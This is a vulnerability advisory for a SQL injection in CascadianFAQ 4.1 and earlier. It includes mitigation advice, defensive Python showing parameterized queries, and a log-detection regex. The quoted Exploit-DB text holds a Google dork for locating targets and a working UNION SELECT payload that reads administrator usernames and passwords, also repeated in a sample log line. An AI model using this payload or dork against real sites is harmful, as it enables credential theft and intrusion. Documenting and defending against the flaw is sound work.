Vendor: CascadianFAQ
Author: ajann
CVSS: 7.5 (HIGH)
Vulnerability type: Remote Blind SQL Injection
CWE: 89
Product Name: CascadianFAQ
Affected Versions: CascadianFAQ <= 4.1
Patch Exists: NO
Year: 2007

CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability

The vulnerability lies in the handling of the catid parameter by index.php in CascadianFAQ version 4.1 and earlier. The parameter value is used in a database query without adequate validation, so an attacker who controls it can execute arbitrary SQL statements and retrieve sensitive information from the database (the raw advisory below shows a UNION query that reads administrator credentials from the cfaq_admin table). A working example is included in the advisory text.

Mitigation:

To mitigate this vulnerability, update to a patched version of CascadianFAQ if one becomes available (none is listed above), or apply strict input validation to the catid parameter so that only a legitimate category identifier ever reaches the database query.
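The following added example (not CascadianFAQ code; the table and column names and the log lines are constructed stand-ins, since the real schema is not on this page) contrasts the vulnerable string-splicing pattern with a hardened lookup that validates catid as an integer and binds it as a query parameter, and adds a simple log check that flags requests shaped like the payload in the advisory below.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the FAQ database. The real CascadianFAQ
# schema is not on the page, so this table and its columns are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE faq_category (catid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO faq_category VALUES (?, ?)",
                     [(1, "General"), (2, "Billing")])
    return conn

# Vulnerable pattern: the raw request parameter is spliced into the SQL text,
# so a value such as "-1 union select ..." becomes part of the statement.
# This function only builds the string; it is never executed here.
def build_query_unsafe(catid_param):
    return "SELECT name FROM faq_category WHERE catid=" + catid_param

# Hardened pattern: accept only a plain decimal id, then bind it as a
# parameter so the database never interprets it as SQL.
CATID_RE = re.compile(r"^\d{1,9}$")

def lookup_category(conn, catid_param):
    if not CATID_RE.fullmatch(catid_param):
        raise ValueError("catid must be a positive integer")
    row = conn.execute("SELECT name FROM faq_category WHERE catid=?",
                       (int(catid_param),)).fetchone()
    return row[0] if row else None

# Detection: flag access-log requests whose catid value carries UNION/SELECT,
# char() sequences or a trailing comment, as in the advisory payload.
INJECTION_RE = re.compile(r"catid=[^&\s]*(union|select|char\(|/\*)", re.IGNORECASE)

def suspicious_requests(log_lines):
    return [line for line in log_lines if INJECTION_RE.search(line)]

# Constructed sample log: one legitimate request, one injection attempt.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Jan/2007] "GET /faq/index.php?catid=2 HTTP/1.1" 200',
    '10.0.0.9 - - [30/Jan/2007] "GET /faq/index.php?catid=-1%20union%20select'
    '%20concat(char(85),username),2%20from%20cfaq_admin/* HTTP/1.1" 200',
]
```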

Exploit-DB raw data:

*******************************************************************************
# Title   :  CascadianFAQ <= 4.1 (index.php) Remote Blind SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  http://eclectic-designs.com
# $$      :  Free
# Dork    :  This FAQ is powered by CascadianFAQ
# DorkEx  :  http://www.google.com.tr/search?hl=tr&q=This+FAQ+is+powered+by+CascadianFAQ+&btnG=Google%27da+Ara&meta=

*******************************************************************************

[[SQL]]---------------------------------------------------------

http://[target]/[path]//index.php?catid=[SQL]

Example:

//index.php?catid=-1%20union%20select%20concat(char(85),char(115),char(101),char(114),char(110),char(97),char(109),char(101),char(58),username,char(32),char(124),char(124),char(32),char(80),char(97),char(115),char(115),char(119),char(111),char(114),char(100),char(58),password),2%20from%20cfaq_admin%20where%20accesslevel%20like%201/*

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# I'm not a Hacker!

# milw0rm.com [2007-01-30]